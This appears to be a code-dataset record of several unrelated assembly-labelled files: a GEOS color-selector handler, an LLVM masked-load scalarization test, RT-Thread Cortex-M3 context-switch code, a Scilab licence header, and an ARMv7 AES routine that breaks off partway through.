call GrObjControlOutputActionRegsToGrObjs
.leave
ret
GrObjLineColorSelectorSetDrawMask endm
COMMENT @----------------------------------------------------------------------
MESSAGE: GrObjLineColorSelectorUpdateUI --
MSG_GEN_CONTROL_UPDATE_UI for GrObjLineColorSelectorClass
DESCRIPTION: Handle notification of attributes change
PASS:
*ds:si - instance data
es - segment of GrObjLineColorSelectorClass
ax - The message
ss:bp - GenControlUpdateUIParams
GCUUIP_manufacturer ManufacturerIDs
GCUUIP_changeType word
GCUUIP_dataBlock hptr
GCUUIP_toolInteraction optr
GCUUIP_features word
GCUUIP_toolboxFeatures word
GCUUIP_childBlock hptr
RETURN: none
DESTROYED:
bx, si, di, ds, es (message handler)
REGISTER/STACK USAGE:
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
Tony 11/12/91 Initial version
------------------------------------------------------------------------------@
GrObjLineColorSelectorUpdateUI method dynamic GrObjLineColorSelectorClass,
MSG_GEN_CONTROL_UPDATE_UI
push ds
mov dx, GWNT_GROBJ_LINE_ATTR_CHANGE
call GetLineNotifyColor
jne done
call UnlockNotifBlock
pop ds
; dxcx - color
; al - DrawMasks
; bx - GraphicPattern NOT YET
; di - VisTextCharAttrFlags
; GAAD_MULTIPLE_COLORS
; GAAD_MULTIPLE_GRAY_SCREENS
; GAAD_MULTIPLE_PATTERNS
call UpdateLineColorCommon
done:
ret
GrObjLineColorSelectorUpdateUI endm
COMMENT @----------------------------------------------------------------------
FUNCTION: UpdateColorCommon
DESCRIPTION: Common code to update a color selector
CALLED BY: INTERNAL
PASS:
*ds:si - controller
ss:bp - GenControlUpdateUIParams
dxcx - color
al - DrawMasks
bx - GraphicPattern
di - VisTextCharAttrFlags
VTCAF_MULTIPLE_COLORS
VTCAF_MULTIPLE_GRAY_SCREENS
VTCAF_MULTIPLE_PATTERNS
RETURN:
none
DESTROYED:
ax, bx, cx, dx, si, di
REGISTER/STACK USAGE:
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
Tony 3/24/92 Initial version
------------------------------------------------------------------------------@
UpdateLineColorCommon proc near uses bp
.enter
; push bx ;save hatch
push ax ;save draw mask
; update color
mov bp, di
and bp, mask GOBLAD_MULTIPLE_COLORS ;bp = indeterm
mov ax, MSG_COLOR_SELECTOR_UPDATE_COLOR
call ObjCallInstanceNoLock
; update draw mask
pop cx
mov dx, di
and dx, mask GOBLAD_MULTIPLE_MASKS
mov ax, MSG_COLOR_SELECTOR_UPDATE_DRAW_MASK
call ObjCallInstanceNoLock
.leave
ret
UpdateLineColorCommon endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GetLineNotifyColor
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Common routine to get notification data for color
CALLED BY: GrObjLineColorSelectorUpdateUI(), CharBGColorControlUpdateUI()
PASS: ss:bp - GenControlUpdateUIParams
GCUUIP_manufacturer ManufacturerID
GCUUIP_changeType word
GCUUIP_dataBlock hptr
GCUUIP_toolInteraction optr
GCUUIP_features word
GCUUIP_toolboxFeatures word
GCUUIP_childBlock hptr
dx - NotifyStandardNotificationTypes to match
NOTE: this notification type must use NotifyColorChange
RETURN: ds - seg addr of notification block
z flag - set if common color notification:
di - VisTextCharAttrFlags
VTCAF_MULTIPLE_COLORS
VTCAF_MULTIPLE_GRAY_SCREENS
-or-
VTCAF_MULTIPLE_BG_COLORS
VTCAF_MULTIPLE_BG_GRAY_SCREENS
-or-
VTPAF_MULTIPLE_BG_COLORS
VTPAF_MULTIPLE_BG_GRAY_SCREENS
-or-
VTPABF_MULTIPLE_BORDER_COLORS
VTPABF_MULTIPLE_BORDER_GRAY_SCREENS
ax - SystemDrawMask
dxcx - color
bx - GraphicPattern
DESTROYED: none
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
eca 2/26/92 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GetLineNotifyColor proc near
.enter
;
; Get notification data and figure out what type it is
;
mov bx, ss:[bp].GCUUIP_dataBlock ;bx <- notification block
call MemLock
mov ds, ax
clr ax
cmp ss:[bp].GCUUIP_changeType, dx ;common type?
jne done ;branch if not
;
; Get color from NotifyColorChange (common structure)
;
mov al, ds:[GNLAC_lineAttr].GOBLAE_mask
mov ch, CF_RGB
mov cl, ds:[GNLAC_lineAttr].GOBLAE_r
mov dh, ds:[GNLAC_lineAttr].GOBLAE_b
mov dl, ds:[GNLAC_lineAttr].GOBLAE_g
; mov bx, {word} ds:NCC_pattern
mov di, ds:[GNLAC_lineAttrDiffs]
done:
.leave
ret
GetLineNotifyColor endp
GrObjUIControllerCode ends
| {
"language": "Assembly"
} |
; NOTE: Assertions have been autogenerated by utils/update_test_checks.py
; RUN: opt -S %s -scalarize-masked-mem-intrin -mtriple=x86_64-linux-gnu | FileCheck %s
define <2 x i64> @scalarize_v2i64(<2 x i64>* %p, <2 x i1> %mask, <2 x i64> %passthru) {
; CHECK-LABEL: @scalarize_v2i64(
; CHECK-NEXT: [[TMP1:%.*]] = bitcast <2 x i64>* [[P:%.*]] to i64*
; CHECK-NEXT: [[TMP2:%.*]] = extractelement <2 x i1> [[MASK:%.*]], i64 0
; CHECK-NEXT: br i1 [[TMP2]], label [[COND_LOAD:%.*]], label [[ELSE:%.*]]
; CHECK: cond.load:
; CHECK-NEXT: [[TMP3:%.*]] = getelementptr inbounds i64, i64* [[TMP1]], i32 0
; CHECK-NEXT: [[TMP4:%.*]] = load i64, i64* [[TMP3]], align 8
; CHECK-NEXT: [[TMP5:%.*]] = insertelement <2 x i64> [[PASSTHRU:%.*]], i64 [[TMP4]], i64 0
; CHECK-NEXT: br label [[ELSE]]
; CHECK: else:
; CHECK-NEXT: [[RES_PHI_ELSE:%.*]] = phi <2 x i64> [ [[TMP5]], [[COND_LOAD]] ], [ [[PASSTHRU]], [[TMP0:%.*]] ]
; CHECK-NEXT: [[TMP6:%.*]] = extractelement <2 x i1> [[MASK]], i64 1
; CHECK-NEXT: br i1 [[TMP6]], label [[COND_LOAD1:%.*]], label [[ELSE2:%.*]]
; CHECK: cond.load1:
; CHECK-NEXT: [[TMP7:%.*]] = getelementptr inbounds i64, i64* [[TMP1]], i32 1
; CHECK-NEXT: [[TMP8:%.*]] = load i64, i64* [[TMP7]], align 8
; CHECK-NEXT: [[TMP9:%.*]] = insertelement <2 x i64> [[RES_PHI_ELSE]], i64 [[TMP8]], i64 1
; CHECK-NEXT: br label [[ELSE2]]
; CHECK: else2:
; CHECK-NEXT: [[RES_PHI_ELSE3:%.*]] = phi <2 x i64> [ [[TMP9]], [[COND_LOAD1]] ], [ [[RES_PHI_ELSE]], [[ELSE]] ]
; CHECK-NEXT: ret <2 x i64> [[RES_PHI_ELSE3]]
;
%ret = call <2 x i64> @llvm.masked.load.v2i64.p0v2i64(<2 x i64>* %p, i32 128, <2 x i1> %mask, <2 x i64> %passthru)
ret <2 x i64> %ret
}
define <2 x i64> @scalarize_v2i64_ones_mask(<2 x i64>* %p, <2 x i64> %passthru) {
; CHECK-LABEL: @scalarize_v2i64_ones_mask(
; CHECK-NEXT: [[TMP1:%.*]] = load <2 x i64>, <2 x i64>* [[P:%.*]], align 8
; CHECK-NEXT: ret <2 x i64> [[TMP1]]
;
%ret = call <2 x i64> @llvm.masked.load.v2i64.p0v2i64(<2 x i64>* %p, i32 8, <2 x i1> <i1 true, i1 true>, <2 x i64> %passthru)
ret <2 x i64> %ret
}
define <2 x i64> @scalarize_v2i64_zero_mask(<2 x i64>* %p, <2 x i64> %passthru) {
; CHECK-LABEL: @scalarize_v2i64_zero_mask(
; CHECK-NEXT: [[TMP1:%.*]] = bitcast <2 x i64>* [[P:%.*]] to i64*
; CHECK-NEXT: ret <2 x i64> [[PASSTHRU:%.*]]
;
%ret = call <2 x i64> @llvm.masked.load.v2i64.p0v2i64(<2 x i64>* %p, i32 8, <2 x i1> <i1 false, i1 false>, <2 x i64> %passthru)
ret <2 x i64> %ret
}
define <2 x i64> @scalarize_v2i64_const_mask(<2 x i64>* %p, <2 x i64> %passthru) {
; CHECK-LABEL: @scalarize_v2i64_const_mask(
; CHECK-NEXT: [[TMP1:%.*]] = bitcast <2 x i64>* [[P:%.*]] to i64*
; CHECK-NEXT: [[TMP2:%.*]] = getelementptr inbounds i64, i64* [[TMP1]], i32 1
; CHECK-NEXT: [[TMP3:%.*]] = load i64, i64* [[TMP2]], align 8
; CHECK-NEXT: [[TMP4:%.*]] = insertelement <2 x i64> [[PASSTHRU:%.*]], i64 [[TMP3]], i64 1
; CHECK-NEXT: ret <2 x i64> [[TMP4]]
;
%ret = call <2 x i64> @llvm.masked.load.v2i64.p0v2i64(<2 x i64>* %p, i32 8, <2 x i1> <i1 false, i1 true>, <2 x i64> %passthru)
ret <2 x i64> %ret
}
; This use a byte sized but non power of 2 element size. This used to crash due to bad alignment calculation.
define <2 x i24> @scalarize_v2i24(<2 x i24>* %p, <2 x i1> %mask, <2 x i24> %passthru) {
; CHECK-LABEL: @scalarize_v2i24(
; CHECK-NEXT: [[TMP1:%.*]] = bitcast <2 x i24>* [[P:%.*]] to i24*
; CHECK-NEXT: [[TMP2:%.*]] = extractelement <2 x i1> [[MASK:%.*]], i64 0
; CHECK-NEXT: br i1 [[TMP2]], label [[COND_LOAD:%.*]], label [[ELSE:%.*]]
; CHECK: cond.load:
; CHECK-NEXT: [[TMP3:%.*]] = getelementptr inbounds i24, i24* [[TMP1]], i32 0
; CHECK-NEXT: [[TMP4:%.*]] = load i24, i24* [[TMP3]], align 1
; CHECK-NEXT: [[TMP5:%.*]] = insertelement <2 x i24> [[PASSTHRU:%.*]], i24 [[TMP4]], i64 0
; CHECK-NEXT: br label [[ELSE]]
; CHECK: else:
; CHECK-NEXT: [[RES_PHI_ELSE:%.*]] = phi <2 x i24> [ [[TMP5]], [[COND_LOAD]] ], [ [[PASSTHRU]], [[TMP0:%.*]] ]
; CHECK-NEXT: [[TMP6:%.*]] = extractelement <2 x i1> [[MASK]], i64 1
; CHECK-NEXT: br i1 [[TMP6]], label [[COND_LOAD1:%.*]], label [[ELSE2:%.*]]
; CHECK: cond.load1:
; CHECK-NEXT: [[TMP7:%.*]] = getelementptr inbounds i24, i24* [[TMP1]], i32 1
; CHECK-NEXT: [[TMP8:%.*]] = load i24, i24* [[TMP7]], align 1
; CHECK-NEXT: [[TMP9:%.*]] = insertelement <2 x i24> [[RES_PHI_ELSE]], i24 [[TMP8]], i64 1
; CHECK-NEXT: br label [[ELSE2]]
; CHECK: else2:
; CHECK-NEXT: [[RES_PHI_ELSE3:%.*]] = phi <2 x i24> [ [[TMP9]], [[COND_LOAD1]] ], [ [[RES_PHI_ELSE]], [[ELSE]] ]
; CHECK-NEXT: ret <2 x i24> [[RES_PHI_ELSE3]]
;
%ret = call <2 x i24> @llvm.masked.load.v2i24.p0v2i24(<2 x i24>* %p, i32 8, <2 x i1> %mask, <2 x i24> %passthru)
ret <2 x i24> %ret
}
; This use a byte sized but non power of 2 element size. This used to crash due to bad alignment calculation.
define <2 x i48> @scalarize_v2i48(<2 x i48>* %p, <2 x i1> %mask, <2 x i48> %passthru) {
; CHECK-LABEL: @scalarize_v2i48(
; CHECK-NEXT: [[TMP1:%.*]] = bitcast <2 x i48>* [[P:%.*]] to i48*
; CHECK-NEXT: [[TMP2:%.*]] = extractelement <2 x i1> [[MASK:%.*]], i64 0
; CHECK-NEXT: br i1 [[TMP2]], label [[COND_LOAD:%.*]], label [[ELSE:%.*]]
; CHECK: cond.load:
; CHECK-NEXT: [[TMP3:%.*]] = getelementptr inbounds i48, i48* [[TMP1]], i32 0
; CHECK-NEXT: [[TMP4:%.*]] = load i48, i48* [[TMP3]], align 2
; CHECK-NEXT: [[TMP5:%.*]] = insertelement <2 x i48> [[PASSTHRU:%.*]], i48 [[TMP4]], i64 0
; CHECK-NEXT: br label [[ELSE]]
; CHECK: else:
; CHECK-NEXT: [[RES_PHI_ELSE:%.*]] = phi <2 x i48> [ [[TMP5]], [[COND_LOAD]] ], [ [[PASSTHRU]], [[TMP0:%.*]] ]
; CHECK-NEXT: [[TMP6:%.*]] = extractelement <2 x i1> [[MASK]], i64 1
; CHECK-NEXT: br i1 [[TMP6]], label [[COND_LOAD1:%.*]], label [[ELSE2:%.*]]
; CHECK: cond.load1:
; CHECK-NEXT: [[TMP7:%.*]] = getelementptr inbounds i48, i48* [[TMP1]], i32 1
; CHECK-NEXT: [[TMP8:%.*]] = load i48, i48* [[TMP7]], align 2
; CHECK-NEXT: [[TMP9:%.*]] = insertelement <2 x i48> [[RES_PHI_ELSE]], i48 [[TMP8]], i64 1
; CHECK-NEXT: br label [[ELSE2]]
; CHECK: else2:
; CHECK-NEXT: [[RES_PHI_ELSE3:%.*]] = phi <2 x i48> [ [[TMP9]], [[COND_LOAD1]] ], [ [[RES_PHI_ELSE]], [[ELSE]] ]
; CHECK-NEXT: ret <2 x i48> [[RES_PHI_ELSE3]]
;
%ret = call <2 x i48> @llvm.masked.load.v2i48.p0v2i48(<2 x i48>* %p, i32 16, <2 x i1> %mask, <2 x i48> %passthru)
ret <2 x i48> %ret
}
declare <2 x i24> @llvm.masked.load.v2i24.p0v2i24(<2 x i24>*, i32, <2 x i1>, <2 x i24>)
declare <2 x i48> @llvm.masked.load.v2i48.p0v2i48(<2 x i48>*, i32, <2 x i1>, <2 x i48>)
declare <2 x i64> @llvm.masked.load.v2i64.p0v2i64(<2 x i64>*, i32, <2 x i1>, <2 x i64>)
| {
"language": "Assembly"
} |
;/*
; * Copyright (c) 2006-2018, RT-Thread Development Team
; *
; * SPDX-License-Identifier: Apache-2.0
; *
; * Change Logs:
; * Date Author Notes
; * 2009-01-17 Bernard first version
; * 2009-09-27 Bernard add protect when contex switch occurs
; * 2013-06-18 aozima add restore MSP feature.
; * 2013-07-09 aozima enhancement hard fault exception handler.
; */
;/**
; * @addtogroup cortex-m3
; */
;/*@{*/
SCB_VTOR EQU 0xE000ED08 ; Vector Table Offset Register
NVIC_INT_CTRL EQU 0xE000ED04 ; interrupt control state register
NVIC_SYSPRI2 EQU 0xE000ED20 ; system priority register (2)
NVIC_PENDSV_PRI EQU 0x00FF0000 ; PendSV priority value (lowest)
NVIC_PENDSVSET EQU 0x10000000 ; value to trigger PendSV exception
SECTION .text:CODE(2)
THUMB
REQUIRE8
PRESERVE8
IMPORT rt_thread_switch_interrupt_flag
IMPORT rt_interrupt_from_thread
IMPORT rt_interrupt_to_thread
;/*
; * rt_base_t rt_hw_interrupt_disable();
; */
EXPORT rt_hw_interrupt_disable
rt_hw_interrupt_disable:
MRS r0, PRIMASK
CPSID I
BX LR
;/*
; * void rt_hw_interrupt_enable(rt_base_t level);
; */
EXPORT rt_hw_interrupt_enable
rt_hw_interrupt_enable:
MSR PRIMASK, r0
BX LR
;/*
; * void rt_hw_context_switch(rt_uint32 from, rt_uint32 to);
; * r0 --> from
; * r1 --> to
; */
EXPORT rt_hw_context_switch_interrupt
EXPORT rt_hw_context_switch
rt_hw_context_switch_interrupt:
rt_hw_context_switch:
; set rt_thread_switch_interrupt_flag to 1
LDR r2, =rt_thread_switch_interrupt_flag
LDR r3, [r2]
CMP r3, #1
BEQ _reswitch
MOV r3, #1
STR r3, [r2]
LDR r2, =rt_interrupt_from_thread ; set rt_interrupt_from_thread
STR r0, [r2]
_reswitch
LDR r2, =rt_interrupt_to_thread ; set rt_interrupt_to_thread
STR r1, [r2]
LDR r0, =NVIC_INT_CTRL ; trigger the PendSV exception (causes context switch)
LDR r1, =NVIC_PENDSVSET
STR r1, [r0]
BX LR
; r0 --> switch from thread stack
; r1 --> switch to thread stack
; psr, pc, lr, r12, r3, r2, r1, r0 are pushed into [from] stack
EXPORT PendSV_Handler
PendSV_Handler:
; disable interrupt to protect context switch
MRS r2, PRIMASK
CPSID I
; get rt_thread_switch_interrupt_flag
LDR r0, =rt_thread_switch_interrupt_flag
LDR r1, [r0]
CBZ r1, pendsv_exit ; pendsv already handled
; clear rt_thread_switch_interrupt_flag to 0
MOV r1, #0x00
STR r1, [r0]
LDR r0, =rt_interrupt_from_thread
LDR r1, [r0]
CBZ r1, switch_to_thread ; skip register save at the first time
MRS r1, psp ; get from thread stack pointer
STMFD r1!, {r4 - r11} ; push r4 - r11 register
LDR r0, [r0]
STR r1, [r0] ; update from thread stack pointer
switch_to_thread
LDR r1, =rt_interrupt_to_thread
LDR r1, [r1]
LDR r1, [r1] ; load thread stack pointer
LDMFD r1!, {r4 - r11} ; pop r4 - r11 register
MSR psp, r1 ; update stack pointer
pendsv_exit
; restore interrupt
MSR PRIMASK, r2
ORR lr, lr, #0x04
BX lr
;/*
; * void rt_hw_context_switch_to(rt_uint32 to);
; * r0 --> to
; */
EXPORT rt_hw_context_switch_to
rt_hw_context_switch_to:
LDR r1, =rt_interrupt_to_thread
STR r0, [r1]
; set from thread to 0
LDR r1, =rt_interrupt_from_thread
MOV r0, #0x0
STR r0, [r1]
; set interrupt flag to 1
LDR r1, =rt_thread_switch_interrupt_flag
MOV r0, #1
STR r0, [r1]
; set the PendSV exception priority
LDR r0, =NVIC_SYSPRI2
LDR r1, =NVIC_PENDSV_PRI
LDR.W r2, [r0,#0x00] ; read
ORR r1,r1,r2 ; modify
STR r1, [r0] ; write-back
LDR r0, =NVIC_INT_CTRL ; trigger the PendSV exception (causes context switch)
LDR r1, =NVIC_PENDSVSET
STR r1, [r0]
; restore MSP
LDR r0, =SCB_VTOR
LDR r0, [r0]
LDR r0, [r0]
NOP
MSR msp, r0
; enable interrupts at processor level
CPSIE F
CPSIE I
; never reach here!
; compatible with old version
EXPORT rt_hw_interrupt_thread_switch
rt_hw_interrupt_thread_switch:
BX lr
IMPORT rt_hw_hard_fault_exception
EXPORT HardFault_Handler
HardFault_Handler:
; get current context
MRS r0, msp ; get fault context from handler.
TST lr, #0x04 ; if(!EXC_RETURN[2])
BEQ _get_sp_done
MRS r0, psp ; get fault context from thread.
_get_sp_done
STMFD r0!, {r4 - r11} ; push r4 - r11 register
;STMFD r0!, {lr} ; push exec_return register
SUB r0, r0, #0x04
STR lr, [r0]
TST lr, #0x04 ; if(!EXC_RETURN[2])
BEQ _update_msp
MSR psp, r0 ; update stack pointer to PSP.
B _update_done
_update_msp
MSR msp, r0 ; update stack pointer to MSP.
_update_done
PUSH {lr}
BL rt_hw_hard_fault_exception
POP {lr}
ORR lr, lr, #0x04
BX lr
END
| {
"language": "Assembly"
} |
// Scilab ( http://www.scilab.org/ ) - This file is part of Scilab
// Copyright (C) 2010 - DIGITEO - Allan CORNET
//
// Copyright (C) 2012 - 2016 - Scilab Enterprises
//
// This file is hereby licensed under the terms of the GNU GPL v2.0,
// pursuant to article 5.3.4 of the CeCILL v.2.1.
// This file was originally licensed under the terms of the CeCILL v2.1,
// and continues to be available under such terms.
// For more information, see the COPYING file which you should have received
// along with this program.
| {
"language": "Assembly"
} |
#include "arm_arch.h"
#if __ARM_MAX_ARCH__>=7
.text
.code 32
#undef __thumb2__
.align 5
Lrcon:
.long 0x01,0x01,0x01,0x01
.long 0x0c0f0e0d,0x0c0f0e0d,0x0c0f0e0d,0x0c0f0e0d @ rotate-n-splat
.long 0x1b,0x1b,0x1b,0x1b
.globl _aes_v8_set_encrypt_key
#ifdef __thumb2__
.thumb_func _aes_v8_set_encrypt_key
#endif
.align 5
_aes_v8_set_encrypt_key:
Lenc_key:
mov r3,#-1
cmp r0,#0
beq Lenc_key_abort
cmp r2,#0
beq Lenc_key_abort
mov r3,#-2
cmp r1,#128
blt Lenc_key_abort
cmp r1,#256
bgt Lenc_key_abort
tst r1,#0x3f
bne Lenc_key_abort
adr r3,Lrcon
cmp r1,#192
veor q0,q0,q0
vld1.8 {q3},[r0]!
mov r1,#8 @ reuse r1
vld1.32 {q1,q2},[r3]!
blt Loop128
beq L192
b L256
.align 4
Loop128:
vtbl.8 d20,{q3},d4
vtbl.8 d21,{q3},d5
vext.8 q9,q0,q3,#12
vst1.32 {q3},[r2]!
.byte 0x00,0x43,0xf0,0xf3 @ aese q10,q0
subs r1,r1,#1
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q10,q10,q1
veor q3,q3,q9
vshl.u8 q1,q1,#1
veor q3,q3,q10
bne Loop128
vld1.32 {q1},[r3]
vtbl.8 d20,{q3},d4
vtbl.8 d21,{q3},d5
vext.8 q9,q0,q3,#12
vst1.32 {q3},[r2]!
.byte 0x00,0x43,0xf0,0xf3 @ aese q10,q0
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q10,q10,q1
veor q3,q3,q9
vshl.u8 q1,q1,#1
veor q3,q3,q10
vtbl.8 d20,{q3},d4
vtbl.8 d21,{q3},d5
vext.8 q9,q0,q3,#12
vst1.32 {q3},[r2]!
.byte 0x00,0x43,0xf0,0xf3 @ aese q10,q0
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q10,q10,q1
veor q3,q3,q9
veor q3,q3,q10
vst1.32 {q3},[r2]
add r2,r2,#0x50
mov r12,#10
b Ldone
.align 4
L192:
vld1.8 {d16},[r0]!
vmov.i8 q10,#8 @ borrow q10
vst1.32 {q3},[r2]!
vsub.i8 q2,q2,q10 @ adjust the mask
Loop192:
vtbl.8 d20,{q8},d4
vtbl.8 d21,{q8},d5
vext.8 q9,q0,q3,#12
vst1.32 {d16},[r2]!
.byte 0x00,0x43,0xf0,0xf3 @ aese q10,q0
subs r1,r1,#1
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q3,q3,q9
vdup.32 q9,d7[1]
veor q9,q9,q8
veor q10,q10,q1
vext.8 q8,q0,q8,#12
vshl.u8 q1,q1,#1
veor q8,q8,q9
veor q3,q3,q10
veor q8,q8,q10
vst1.32 {q3},[r2]!
bne Loop192
mov r12,#12
add r2,r2,#0x20
b Ldone
.align 4
L256:
vld1.8 {q8},[r0]
mov r1,#7
mov r12,#14
vst1.32 {q3},[r2]!
Loop256:
vtbl.8 d20,{q8},d4
vtbl.8 d21,{q8},d5
vext.8 q9,q0,q3,#12
vst1.32 {q8},[r2]!
.byte 0x00,0x43,0xf0,0xf3 @ aese q10,q0
subs r1,r1,#1
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q10,q10,q1
veor q3,q3,q9
vshl.u8 q1,q1,#1
veor q3,q3,q10
vst1.32 {q3},[r2]!
beq Ldone
vdup.32 q10,d7[1]
vext.8 q9,q0,q8,#12
.byte 0x00,0x43,0xf0,0xf3 @ aese q10,q0
veor q8,q8,q9
vext.8 q9,q0,q9,#12
veor q8,q8,q9
vext.8 q9,q0,q9,#12
veor q8,q8,q9
veor q8,q8,q10
b Loop256
Ldone:
str r12,[r2]
mov r3,#0
Lenc_key_abort:
mov r0,r3 @ return value
bx lr
.globl _aes_v8_set_decrypt_key
#ifdef __thumb2__
.thumb_func _aes_v8_set_decrypt_key
#endif
.align 5
_aes_v8_set_decrypt_key:
stmdb sp!,{r4,lr}
bl Lenc_key
cmp r0,#0
bne Ldec_key_abort
sub r2,r2,#240 @ restore original r2
mov r4,#-16
add r0,r2,r12,lsl#4 @ end of key schedule
vld1.32 {q0},[r2]
vld1.32 {q1},[r0]
vst1.32 {q0},[r0],r4
vst1.32 {q1},[r2]!
Loop_imc:
vld1.32 {q0},[r2]
vld1.32 {q1},[r0]
.byte 0xc0,0x03,0xb0,0xf3 @ aesimc q0,q0
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
vst1.32 {q0},[r0],r4
vst1.32 {q1},[r2]!
cmp r0,r2
bhi Loop_imc
vld1.32 {q0},[r2]
.byte 0xc0,0x03,0xb0,0xf3 @ aesimc q0,q0
vst1.32 {q0},[r0]
eor r0,r0,r0 @ return value
Ldec_key_abort:
ldmia sp!,{r4,pc}
.globl _aes_v8_encrypt
#ifdef __thumb2__
.thumb_func _aes_v8_encrypt
#endif
.align 5
_aes_v8_encrypt:
ldr r3,[r2,#240]
vld1.32 {q0},[r2]!
vld1.8 {q2},[r0]
sub r3,r3,#2
vld1.32 {q1},[r2]!
Loop_enc:
.byte 0x00,0x43,0xb0,0xf3 @ aese q2,q0
.byte 0x84,0x43,0xb0,0xf3 @ aesmc q2,q2
vld1.32 {q0},[r2]!
subs r3,r3,#2
.byte 0x02,0x43,0xb0,0xf3 @ aese q2,q1
.byte 0x84,0x43,0xb0,0xf3 @ aesmc q2,q2
vld1.32 {q1},[r2]!
bgt Loop_enc
.byte 0x00,0x43,0xb0,0xf3 @ aese q2,q0
.byte 0x84,0x43,0xb0,0xf3 @ aesmc q2,q2
vld1.32 {q0},[r2]
.byte 0x02,0x43,0xb0,0xf3 @ aese q2,q1
veor q2,q2,q0
vst1.8 {q2},[r1]
bx lr
.globl _aes_v8_decrypt
#ifdef __thumb2__
.thumb_func _aes_v8_decrypt
#endif
.align 5
_aes_v8_decrypt:
ldr r3,[r2,#240]
vld1.32 {q0},[r2]!
vld1.8 {q2},[r0]
sub r3,r3,#2
vld1.32 {q1},[r2]!
Loop_dec:
.byte 0x40,0x43,0xb0,0xf3 @ aesd q2,q0
.byte 0xc4,0x43,0xb0,0xf3 @ aesimc q2,q2
vld1.32 {q0},[r2]!
subs r3,r3,#2
.byte 0x42,0x43,0xb0,0xf3 @ aesd q2,q1
.byte 0xc4,0x43,0xb0,0xf3 @ aesimc q2,q2
vld1.32 {q1},[r2]!
bgt Loop_dec
.byte 0x40,0x43,0xb0,0xf3 @ aesd q2,q0
.byte 0xc4,0x43,0xb0,0xf3 @ aesimc q2,q2
vld1.32 {q0},[r2]
.byte 0x42,0x43,0xb0,0xf3 @ aesd q2,q1
veor q2,q2,q0
vst1.8 {q2},[r1]
bx lr
.globl _aes_v8_cbc_encrypt
#ifdef __thumb2__
.thumb_func _aes_v8_cbc_encrypt
#endif
.align 5
_aes_v8_cbc_encrypt:
mov ip,sp
stmdb sp!,{r4,r5,r6,r7,r8,lr}
vstmdb sp!,{d8,d9,d10,d11,d12,d13,d14,d15} @ ABI specification says so
ldmia ip,{r4,r5} @ load remaining args
subs r2,r2,#16
mov r8,#16
blo Lcbc_abort
moveq r8,#0
cmp r5,#0 @ en- or decrypting?
ldr r5,[r3,#240]
and r2,r2,#-16
vld1.8 {q6},[r4]
vld1.8 {q0},[r0],r8
vld1.32 {q8,q9},[r3] @ load key schedule...
sub r5,r5,#6
add r7,r3,r5,lsl#4 @ pointer to last 7 round keys
sub r5,r5,#2
vld1.32 {q10,q11},[r7]!
vld1.32 {q12,q13},[r7]!
vld1.32 {q14,q15},[r7]!
vld1.32 {q7},[r7]
add r7,r3,#32
mov r6,r5
beq Lcbc_dec
cmp r5,#2
veor q0,q0,q6
veor q5,q8,q7
beq Lcbc_enc128
vld1.32 {q2,q3},[r7]
add r7,r3,#16
add r6,r3,#16*4
add r12,r3,#16*5
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
add r14,r3,#16*6
add r3,r3,#16*7
b Lenter_cbc_enc
.align 4
Loop_cbc_enc:
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
vst1.8 {q6},[r1]!
Lenter_cbc_enc:
.byte 0x22,0x03,0xb0,0xf3 @ aese q0,q9
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x04,0x03,0xb0,0xf3 @ aese q0,q2
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
vld1.32 {q8},[r6]
cmp r5,#4
.byte 0x06,0x03,0xb0,0xf3 @ aese q0,q3
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
vld1.32 {q9},[r12]
beq Lcbc_enc192
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
vld1.32 {q8},[r14]
.byte 0x22,0x03,0xb0,0xf3 @ aese q0,q9
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
vld1.32 {q9},[r3]
nop
Lcbc_enc192:
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
subs r2,r2,#16
.byte 0x22,0x03,0xb0,0xf3 @ aese q0,q9
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
moveq r8,#0
.byte 0x24,0x03,0xb0,0xf3 @ aese q0,q10
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x26,0x03,0xb0,0xf3 @ aese q0,q11
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
vld1.8 {q8},[r0],r8
.byte 0x28,0x03,0xb0,0xf3 @ aese q0,q12
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
veor q8,q8,q5
.byte 0x2a,0x03,0xb0,0xf3 @ aese q0,q13
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
